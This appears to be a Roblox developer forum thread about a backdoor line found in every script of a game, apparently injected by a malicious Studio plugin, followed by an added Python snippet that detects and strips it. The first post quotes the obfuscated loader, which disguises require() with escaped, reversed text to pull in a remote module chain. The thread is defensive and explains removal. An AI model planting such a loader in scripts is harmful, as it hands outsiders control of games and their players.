Recently while helping my friend make his game, I noticed this line inside EVERY script:
--[[ Last synced 9/26/2020 04:22 RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722703997) --[[ ]]--
What is this?
It definitely looks like a backdoor, but what is it exactly and how do I get rid of it?
Also, it comes back after I remove the line.
EDIT: Managed to get rid of it with RoDefender, it was named “AntiVirus”
Had to clear out the scripts manually though
EDIT 2: This post seems to get a lot of traction, so my advice is just to watch out for plugins. All the scripts changed while in Studio, so a normal model/script can’t do that. It was probably one of my friend’s plugins, since this appeared only in his Team Create game. So just watch out for any suspicious plugins, and download only the official ones (check if the creator is not a group!)
@DoctorNO2106 is right, it’s a backdoor. That code is basically the same thing as require(5722703997). This could be used for numerous things, but I’m assuming it’s being used for “Server-side Exploits”.
The easiest way to fix this is to use the Find Results tool in Studio and search for 5722703997 in all Scripts, and remove that line from the Script.
Here is where the rabbit hole of require() functions leads you to: [ Content Deleted ] - Roblox, an obfuscated ModuleScript.
Most likely a malicious plugin that is installed in your Studio is causing this. I would recommend installing plugins that are from trusted creators only.
Would you mind sending a list of your plugins? Also, if the game has Team Create enabled, make sure none of your collaborators have a malicious plugin either.
It’s a backdoor that infects every script through plugins made by malicious people. I found this out through a friend’s game that had over 700 scripts infected by this. Thankfully they were able to fix this by reverting to an older version of the game that was made not that long ago.
Hey, I’m pretty interested in this stuff, would you mind showing how some of this is done? Seems ridiculous that you can use a simple module to sandbox an obfuscated script.
All you have to do to find where this goes is to copy/paste the ID it’s requiring (which is in plain sight) into your browser address bar. There are no fancy tricks needed to see what this does.
Edit: He’s talking about the module script that he reached once he went down the rabbit hole of scripts. It’s obfuscated, and you need some fancy tricks to figure out what’s going on in that script.
Yeah, the annoying thing is that you can’t actually see what this does since it’s a module chain, and I really don’t feel like sorting through 50+ modules.
EDIT: Oh yeah, I forgot that you can obfuscate scripts, makes it even more annoying lol
Well, there are still a few edge cases that I need to figure out. One of the scripts I managed to trace was somehow able to detect that I was modifying the global environment, probably with a length checker or something. If you’d like to talk more about trying to sandbox silently, I’m happy to.
After doing the long process of going through every script in the game and scrolling down to the line then selecting the whole line and deleting it, I’m safe to say that the issue was fixed.
This was causing multiple people’s games to crash as it caused a memory leak. After doing this the client memory went down to 400 (was 1,400 originally) and players stopped getting kicked. Sometimes the long way is the hard way, but it worked. Other than that, remove your plugins that aren’t made by a trusted developer.
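The line from the first post, decoded and removed offline, as an added example that is not part of the thread or any poster's code. It assumes the scripts have been exported to text files; the function names and the sample script are constructed for illustration, and the check also covers the variant without string.reverse.

```python
import re

# Lua decimal escape such as \101 (one to three digits)
LUA_DEC_ESCAPE = re.compile(r"\\(\d{1,3})")
# getfenv()[<string>](<asset id>); the string may be wrapped in string.reverse(...)
LOADER = re.compile(
    r'getfenv\s*\(\s*\)\s*\[\s*(string\.reverse\s*\(\s*)?"([^"]*)"\s*\)?\s*\]'
    r"\s*\(\s*(\d+)\s*\)"
)
BLOCK_COMMENT = re.compile(r"--\[\[.*?\]\]")  # Lua --[[ ... ]] comment

def decode_lua_string(literal):
    """Resolve \\ddd decimal escapes the way the Lua lexer would."""
    return LUA_DEC_ESCAPE.sub(lambda m: chr(int(m.group(1))), literal)

def find_hidden_requires(source):
    """Return (line_number, asset_id) for every disguised require(id)."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        for m in LOADER.finditer(line):
            name = decode_lua_string(m.group(2))
            if m.group(1):  # literal was wrapped in string.reverse(...)
                name = name[::-1]
            if name == "require":
                hits.append((number, int(m.group(3))))
    return hits

def strip_loader(source):
    """Drop lines holding only the loader and block comments.

    A flagged line that also carries other code is kept for manual review.
    """
    flagged = {n for n, _ in find_hidden_requires(source)}
    kept = []
    for number, line in enumerate(source.splitlines(), start=1):
        rest = BLOCK_COMMENT.sub("", LOADER.sub("", line)).strip(" \t-")
        if number in flagged and not rest:
            continue
        kept.append(line)
    return "\n".join(kept)

# Constructed sample: a harmless script with the line from the first post appended
SAMPLE = (
    'print("door opened")\n'
    '--[[ Last synced 9/26/2020 04:22 RoSync Loader ]] '
    'getfenv()[string.reverse("\\101\\114\\105\\117\\113\\101\\114")](5722703997) --[[ ]]--\n'
)

if __name__ == "__main__":
    print(find_hidden_requires(SAMPLE))  # line number and required asset id
    print(strip_loader(SAMPLE))
```

Cleaning the scripts does not stop reinfection while the plugin that writes the line is still installed, as the first post found.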